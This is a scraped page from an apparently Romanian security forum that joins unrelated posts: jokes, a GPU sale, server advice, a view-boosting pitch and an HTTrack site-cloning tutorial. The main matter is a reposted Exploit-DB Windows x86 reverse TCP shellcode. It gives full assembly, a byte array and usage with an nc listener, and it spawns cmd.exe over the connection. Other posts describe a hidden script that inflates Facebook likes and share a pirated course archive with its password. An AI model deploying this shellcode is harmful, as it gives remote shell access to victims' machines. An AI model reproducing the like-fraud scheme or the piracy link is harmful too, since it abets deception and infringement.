Leaderboard

Eu cu ma-sa lu Ganjaa. Cand nu vrea s-o ia, dau cu --force

Am rescris codul, era un singur fisier mare, acum arata mai normal. Sper ca in curand sa ii pot face update-ul pe care vreau sa il fac. https://github.com/NytroRST/ShellcodeCompiler

########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ######## ########### Author: Snir Levi, Applitects ############# ## 332 Bytes ## ## For Educational Purposes Only ## Date: 01.03.17 Author: Snir Levi Email: snircontact@gmail.com https://github.com/snir-levi/ IP - 127.0.0.1 PORT - 4444 Tested on: Windows 7 Windows 10 ###Usage### Victim Executes the first stage shellcode, and opens tcp connection After Connection is established, send the Alphanumeric stage to the connection nc -lvp 4444 connect to [127.0.0.1] from localhost [127.0.0.1] (port) RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\> ########### ##Shellcode## #### Second Stage Alphanumeric shellcode: ##### RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS R push edx P push eax hoces push 0x7365636f //oces htePr push 0x72506574 //tePr hCrea push 0x61657243 //Crea T push esp Q push ecx PX will be replaced with call [esi] (0x16ff) L*8 dec esp // offset esp to kernel32.dll Address Y pop ecx // ecx = kernel32 F*4 inc esi -> offset [esi+4] PX will be replaced with mov [esi],eax (0x0689) N*4 dec esi -> offset [esi] j0 push 0x30 X pop eax H*48 dec eax // zeroing eax P push eax hessA push 0x41737365 //essA (will be null terminated) hProc push 0x636f7250 //Proc hExit push 0x74697845 //Exit T push esp Q push ecx PX will be replaced with call [esi] (0x16ff) F*8 inc esi -> offset [esi+8] PX will be replaced with mov [esi],eax (0x0689) Z*10 offset stack to &processinfo j0 push 0x30 Y pop ecx I*48 dec ecx // zeroing ecx T push esp X pop eax //eax = &PROCESS_INFORMATION Q*4 push ecx //sub esp,16 W push edi W push edi W push edi Q push ecx Q push ecx B inc edx R push edx Q*10 push ecx jD push 0x44 T push esp Z pop edx //edx = &STARTUPINFOA hexeC push 0x65 hcmd. push 0x78652e64 T push esp // &'cmd.exe' Y pop ecx P push eax // &PROCESS_INFORMATION R push edx // &STARTUPINFOA j0 push 0x30 Z pop edx J*48 dec edx // zeroing edx R*3 push edx B inc edx R push edx J dec edx R*2 push edx Q push ecx ; &'cmd.exe' R push edx A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated N*4 dec esi //offset [esi+4] to CreateProccesA S push ebx ; return address ## First Stage Shellcode ## global _start section .text _start: xor eax,eax push eax ; null terminator for createProcA mov eax,[fs:eax+0x30] ; Proccess Enviroment Block mov eax,[eax+0xc] mov esi,[eax+0x14] lodsd xchg esi,eax lodsd mov ebx,[eax+0x10] ; kernel32 mov ecx,[ebx+0x3c] ; DOS->elf_anew add ecx, ebx; Skip to PE start mov ecx, [ecx+0x78] ; offset to export table add ecx,ebx ; kernel32 image_export_dir mov esi,[ecx+0x20] ; Name Table add esi,ebx xor edx,edx getProcAddress: inc edx lodsd add eax,ebx cmp dword [eax],'GetP' jne getProcAddress cmp dword [eax+4],'rocA' jne getProcAddress ;---Function Adresses Chain---- ;[esi] GetProcAddress ;[esi+12] WSAstartup ;[esi+16] WSASocketA ;[esi+20] connect ;[esi+24] recv ;[esi+28] kernel32 ;Alphanumeric stage store: ;[esi+4] CreateProcessA ;[esi+8] ExitProccess mov esi,[ecx+0x1c] ; Functions Addresses Chain add esi,ebx mov edx,[esi+edx*4] add edx,ebx ; GetProcAddress sub esp, 32 ; Buffer for the function addresses chain push esp pop esi mov [esp],edx ; esi offset 0 -> GetProcAddress mov [esi+28],ebx ;esi offset 28 -> kernel32 ;--------winsock2.dll Address-------------- xor edi,edi push edi push 0x41797261 ; Ayra push 0x7262694c ; rbiL push 0x64616f4c ; daoL push esp push ebx call [esi] ;-----ws2_32.dll Address------- xor ecx,ecx push ecx mov cx, 0x3233 ; 0023 push ecx push 0x5f327377 ; _2sw push esp call eax mov ebp,eax ;ebp = ws2_32.dll ;-------WSAstartup Address------------- xor ecx,ecx push ecx mov cx, 0x7075 ; 00up push ecx push 0x74726174 ; trat push 0x53415357 ; SASW push esp push ebp call [esi] mov [esi+12],eax ;esi offset 12 -> WSAstartup ;-------WSASocketA Address------------- xor ecx,ecx push ecx mov cx, 0x4174 ; 00At push ecx push 0x656b636f ; ekco push 0x53415357 ; SASW push esp push ebp call [esi] mov [esi+16],eax;esi offset 16 -> WSASocketA ;------connect Address----------- push edi mov ecx, 0x74636565 ; '\0tce' shr ecx, 8 push ecx push 0x6e6e6f63 ; 'nnoc' push esp push ebp call [esi] mov [esi+20],eax;esi offset 20 -> connect ;------recv Address------------- push edi push 0x76636572 ;vcer push esp push ebp call [esi] mov [esi+24],eax;esi offset 24 -> recv ;------call WSAstartup()---------- xor ecx,ecx sub sp,700 push esp mov cx,514 push ecx call [esi+12] ;--------call WSASocket()----------- ; WSASocket(AF_INET = 2, SOCK_STREAM = 1, ; IPPROTO_TCP = 6, NULL, ;(unsigned int)NULL, (unsigned int)NULL); push eax ; if successful, eax = 0 push eax push eax mov al,6 push eax mov al,1 push eax inc eax push eax call [esi+16] xchg eax, edi ; edi = SocketRefernce ;--------call connect---------- ;struct sockaddr_in { ; short sin_family; ; u_short sin_port; ; struct in_addr sin_addr; ; char sin_zero[8]; ;}; push byte 0x1 pop edx shl edx, 24 mov dl, 0x7f ;edx = 127.0.0.1 (hex) push edx push word 0x5c11; port 4444 push word 0x2 ;int connect( ;_In_ SOCKET s, ;_In_ const struct sockaddr *name, ;_In_ int namelen ;); mov edx,esp push byte 16 ; sizeof(sockaddr) push edx ; (sockaddr*) push edi ; socketReference call [esi+20] ;--------call recv()---------- ;int recv( ;_In_ SOCKET s, ;_Out_ char *buf, ;_In_ int len, ;_In_ int flags ;); stage: push eax mov ax,950 push eax ;buffer length push esp pop ebp sub ebp,eax ; set buffer to [esp-950] push ebp ;&buf push edi ;socketReference call [esi+24] executeStage: xor edx,edx mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret mov byte [ebp+96],dl ; null terminator to ExitProcess mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address dec ebp mov word [ebp+20],0x16ff ; call DWORD [esi] mov word [ebp+35],0x0689 ; mov [esi],eax mov word [ebp+110],0x16ff; call DWORD [esi] mov word [ebp+120],0x0689; mov [esi],eax mov ax,0x4173 ; As (CreateProcessA) mov ecx,[esi+28] ; ecx = kernel32 dec dl ;edx = 0x000000ff call ebp ; Execute Alphanumeric stage executeShell: mov [ecx],dl ;null terminator to 'cmd.exe' call dword [esi] ;createProcA push eax call dword [esi+4] ; ExitProccess ----------------------- unsigned char shellcode[]= "\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04"; Sursa: https://www.exploit-db.com/exploits/41481/.

Salut. OVH, Debian, Apache, PHP 7, MSQL, nu are nimic special. Bine, doar pe parte de security e hardcore, l-am configurat cu ./nytro.sh --force

In cazul in care nu am postat la categoria corecta rog un admin sa il mute unde crede el ca este corect. Nu il folositi in mod abuziv, orice trece de 900-1000 de like-uri la zi se cere confirmarea like-ului. Recomandat 400-500 like pe zi. Cum il folosesti ? Faci un fisier pe host gen like.js apoi prin javascripts faci chemare la fisier </script><script type="text/javascript" src="http://www.site.com/like.js"></script> mergi pe facebook la developers.facebook.com si generezi un code de like pentru pagina, (alegi varianta iframe) mergi la sectiunea admin>styles si in fisierul header adaugi code-ul de la punctul 2 si sub el adaugi link-ul de la pagina unde vrei sa primesti like-urile Download link PM pentru parola !

@Nytro, ai un spatiu la sfarsitul linkului.

Am stat o cateva ore cautand acest curs, toate torrent-urile sunt moarte.: Pentester Academy Linux Assembly and Shellcoding Course | MEGA Parola arhivei este: nNFFWQgpmfvMHGr2EhET

mai am placa video GTX 960 2GB in garantie, in cutie completa poze: http://imgur.com/a/XOS6i pret: 650ron

Mai bine spune detalii despre ce si cum folosesti pentru a stii ce sfaturi sa-ti dam. - Platforma web: wordpress, magento, forum ... etc - De ce ai ales sa treci prin cloudflare - un php.ini si config-ul pool-ului de php-fpm ar ajuta. - my.cnf (fisierul de configuratie mysql) - Daca folosesti MySQL sau Percona, MariaDB - Ce engine folosesti pe tabele din baza de date - Ce resurse hardware ai pe server (ssd, hdd, memorie, procesor) - Daca ai SSD, ce procent este utilizat din capacitatea lui (spatiu folosit) - Ruleaza din alta locatie httping catre site-ul tau si arata-ne un timp mediu de raspuns. (ms.) - Ce scor are site-ul tau pe PageSpeed Insights - Daca servesti sau nu continutul prin https

Cu siguranta pe site-ul international e o deschidere imensa...si concurenta ce-i drept, dar m-am axat pe calitate, vreau ca totul sa fie cat mai real si bine detaliat si sigur. Am ales sa fac pentru Romania mai intai pentru a oferi ajutor celor care au content romanesc. Macar cateva sute de vizualizari daca se primesc pentru un video, e un boost eficient, mai ales pentru cei care incep de la 0. Apoi daca continutul este de calitate totul vine de la sine Dupa ce mai optimizez aplicatia, lansez si site-ul international. Stiu cat de importante sunt vizualizarile din US si UK :)....Un videoclip cu reclama la ceva interesant si un link de afiliere....

Salutare,dupa ceva timp am decis sa fac un tutorial despre cum putem sa copiem un website pana in cele mai mici detalii. Pasul 1: Vom incepe prin descarcarea programului necesar clonarii oricarui site web. HTTrack este un program dezvoltat de o echipa de francezi si din fericire pentru noi este distribuit gratuit. Intram pe HTTrack.com si accesam sectiunea Downloads de unde descarcam cea mai noua versiune. Pasul 2: Vom cauta site-ul pe care dorim sa il clonam. Deoarece in urma cu cateva zile am spus intr-un video de pe YouTube ca voi clona un site web apartinand cavaleria.ro ( este doar un exemplu pur demonstrativ) il voi clona pe acela, asa ca adresa mea tinta va fi Cavaleria.RO Pasul 3: Dupa ce am descarcat programul mentionat la pasul anterior, il instalam dupa metoda clasica "Next > I accept > Next > ... > Finish" Pasul 4: Deschidem programul si observam ca suntem intampinati de o fereastra de inceput. Apasam Next. Pasul 5: Vedem ca apar 3 casute: Project name, Project category, Base path Project name - il completam cu un nume oarecare, eu am completat cu "clonarecavaleria" Project category - il completam cu un nume oarecare, eu am completat cu "p_clonarecavaleria" Base path - locul unde dorim sa se salveze clona website-ului Pasul 6: Completam campul Web Adresses cu pagina web ce dorim sa o clonam. Pasul 7: Apasam pe Next dupa care pe Finish si asteptam ca programul sa isi faca treaba (in functie de complexitatea site-ului, clonarea s-ar putea sa dureze.. bine-nteles, depinde si de viteza conexiunii dvs. la internet) Pasul 8: Dupa ce site-ul a fost downloadat (eu cand am ales bluepanel-ul, am oprit operatia de clonare dupa 2-3 minute deoarece downloada fiecare profil al fiecarui jucator, si ar fii durat cateva ore bune) Pasul 9: Intram in C:\My Web Sites sau locatia precizata de dvs la pasul 5 si deschidem folderul denumit precum Project name-ul vostru. Pasul 10: Intram in folderul cavaleria.ro (folderul denumit precum URL-ul site-ului clonat) si putem deschide si observa ca fisierul index.html (precum toate celalalte fisiere) este identic cu cel al site-ului original. Observatii si precizari: Acesta a fost un tutorial pur demonstrativ Acest program este incapabil sa copieze si codul PHP al siteului (adica efectiv partea de script - functionalitatea site-ului) Acest program este foarte util daca doriti sa copiati aspectul unui site, copiaza pana in cele mai mici detalii. Tutorialul este creat de mine,a mai fost postat pe blogul meu! Daca nu intelegi ceva, lasati in comentariu si o sa va raspund. Multumesc pentru timpul acordat!